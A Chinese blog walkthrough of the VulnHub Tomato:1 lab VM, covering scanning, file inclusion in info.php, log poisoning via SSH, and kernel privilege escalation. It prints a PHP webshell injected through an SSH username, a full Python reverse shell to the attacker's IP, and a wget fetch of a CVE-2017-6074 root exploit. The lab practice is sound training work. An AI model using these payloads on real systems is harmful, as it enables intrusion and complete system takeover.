VulnHub渗透测试实战靶场 - Tomato:1

最新推荐文章于 2024-05-15 03:48:02 发布
最新推荐文章于 2024-05-15 03:48:02 发布
阅读量1.7k 收藏 2
点赞数
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/119811906
版权

VulnHub渗透测试实战靶场 - Tomato:1

环境下载

Tomato:1靶机搭建

将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.137
  • 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-10000 192.168.246.137,发现开放了 21、80、2211、8888 四个端口
  • 使用 dirb 扫描一下开放的 80 端口:dirb http://192.168.246.137

漏洞挖掘

  • 访问 http://192.168.246.137/antibot_image/ 发现存在目录 antibots,接着访问该目录,发现存在很多文件
  • 访问 http://192.168.246.137/antibot_image/antibots/info.php,找到 phpinfo 的信息,F12查看源码发现 hint,存在文件包含漏洞

getshell

  • 前面信息搜集时发现开放了 2211 端口,服务为 ssh,尝试对日志文件写入 shell,然后包含日志文件
  • 先查看日志文件是不是在默认路径:http://192.168.246.137/antibot_image/antibots/info.php?image=/var/log/auth.log
  • 利用 ssh 连接,写入一句话木马:ssh '<?php system($_GET['H3rmesk1t']);?>'@192.168.246.137 -p 2211
  • 查看靶机是否安装了 python,whereis python,可以看到目标靶机安装了python3,那就可以利用 python 进行反弹了
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.246.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • 执行命令 python3 -c 'import pty;pty.spawn("/bin/bash")' 将 shell 变为交互式的 shell

提权

  • 执行命令 uname -a 查看 linux 内核版本,寻找有无可以利用的 exp,exp链接
  • 运行 compile.sh 编译c文件,然后在 kali 上用 Python 起一个 Http 服务,python2 -m SimpleHTTPServer 8888,接着在靶机用用 wget 命令 wget http://192.168.246.129:8888/CVE-2017-6074下载 exp
  • 给 exp 赋予执行权限 chmod +x CVE-2017-6074
  • 运行 exp,拿到 root 权限
H3rmesk1t
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
tomato靶机渗透测试
weixin_49340699的博客
07-28 1223
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
Vulnhub靶机TOMATO_ 1
LainWith的博客
08-29 1002
系列Tomato(此系列共1台)发布日期:2020年09月14日注释:使用vmwar workstation运行虚拟机难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径爬取文件包含写入日志内核漏洞枚举本地提权。...
2024年最新靶机实战系列之Tomato靶机(1),鸿蒙内存优化面试题
最新发布
2401_84862079的博客
05-15 372
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机。远程文件包含功能通过info.php发现已经关闭。发现存在ubuntu系统默认写入身份认证文件路径。尝试登录 ssh操作后会写入身份认证日志文件。同样的在日志文件中确实发现了存在相关记录。觉得内容不错,请点一下"赞"和"在看"本地文件包含发现账号tomcat。image参数 存在 文件包含。1.4 源码分析+文件包含。
vulnhub靶场-tomato
qq_42947816的博客
03-07 7491
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶场Tomato
kukudeshuo的博客
07-25 634
vulnhub靶场Tomato 环境准备 靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/ 攻击机:kali(192.168.109.128) 靶机Tomato:(192.168.109.141) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标哦靶机IP为192.168.109.141 使用nmap扫描查看目标端口开放情况 开
tomato-靶机渗透测试
m0_54323635的博客
10-09 168
tomato-靶机渗透测试
vim-airline-tomato:番茄技术
02-01
vim-airline-tomato:番茄技术
healthy-tomato:制作POC组
03-27
健康番茄制作POC组
majestic-tomato:用Stackbit创建的Jamstack网站
04-02
:sparkles: 雄伟的西红柿 :sparkles: 这是一个使用作为的网站。 它是在不到一分钟的时间内使用创建的。... npx @stackbit/sanity-pull --ssg hugo --sanity-project-id qvv3l1s6 --sanity-token $SANITY_ACCESS_
curious-tomato:用Stackbit创建的Jamstack网站
04-19
:sparkles: 好奇的西红柿 :sparkles: 这是一个使用Git作为的网站。 它是在不到一分钟的时间内使用创建的。 您可以像这样,或探索一些变体。 如何不同: :artist_palette: 看 :pencil: 内容管理系统 :gear: 静态网站...
caring-tomato:用Stackbit创建的Jamstack网站
04-22
原因不以营利为主题的模板。 浏览。 使用此可配置的主题,增加非营利性网站或导致网站的存在。 CloudCannon被制成 ,云CMS的化身。 在找到更多模板,主题和分步的Jekyll教程。特征预建页面预先样式化的组件可配置...
VulnhubTomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1409
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
tomato靶机提权
FJawen的博客
05-26 530
tomato靶机提权信息收集利用漏洞权限提升 信息收集 1、 使用arp-scan -l 扫描本地局域网存活主机: 2、 Nmap扫描开放端口以及相关信息: 3、 访问http服务端口查看页面信息: 4、 没有相关可利用信息,继续访问8888端口http服务: 5、 利用dirb对站点目录进行爆破: 6、 发现其他站点并进行访问 7、 根据修改时间发现info.php文件最新更新,访问并查看源码: 发现文件包含,尝试包含文件…/…/…/…/…/…/etc/passwd: 利用漏洞 已知inf
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1499
小白学渗透
【愚公系列】2023年06月 网络安全高级班 101.CTF黑客比赛(Tomato靶机
时光隧道
06-05 4297
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试安全性和发现潜在的漏洞。Tomatosecurity官网提供了Tomato靶机的下载和使用说明。
靶机实战系列之Tomato靶机
Javachichi的博客
02-07 1004
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
Tomato靶机渗透
qq_44732584的博客
03-23 405
渗透测试
Vulnhub-Tomato靶机实战
御七彩虹猫
05-06 938
Vulnhub-Tomato靶机实战
<template> <div class="category-select"> <el-cascader v-model="selectedCategory" :options="categoryOptions" placeholder="请选择分类" size="medium" clearable change-on-select ></el-cascader> </div> </template> <script> export default { data() { return { selectedCategory: [], // 选中的分类 categoryOptions: [ { value: 'fruit', label: '水果', children: [ { value: 'apple', label: '苹果' }, { value: 'banana', label: '香蕉' }, { value: 'orange', label: '橙子' } ] }, { value: 'vegetable', label: '蔬菜', children: [ { value: 'cabbage', label: '白菜' }, { value: 'carrot', label: '胡萝卜' }, { value: 'tomato', label: '番茄' } ] } ] } } } </script> <style scoped> .category-select .el-cascader__label { background-color: #f0f0f0; border-radius: 4px; padding: 6px 12px; color: #333; font-size: 14px; margin-right: 6px; } .category-select .el-cascader__suffix { font-size: 12px; color: #999; } </style>加好看的css样式
05-17
<style scoped> .category-select .el-cascader__label { background-color: #f0f0f0; border-radius: 4px; padding: 6px 12px; color: #333; font-size: 14px; margin-right: 6px; } .category-select .el-cascader__suffix { font-size: 12px; color: #999; } /* 添加选中后的样式 */ .category-select .el-cascader__label--medium.is-active { background-color: #409EFF; color: #fff; } .category-select .el-cascader__label--medium.is-active .el-cascader__suffix { color: #fff; } </style>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值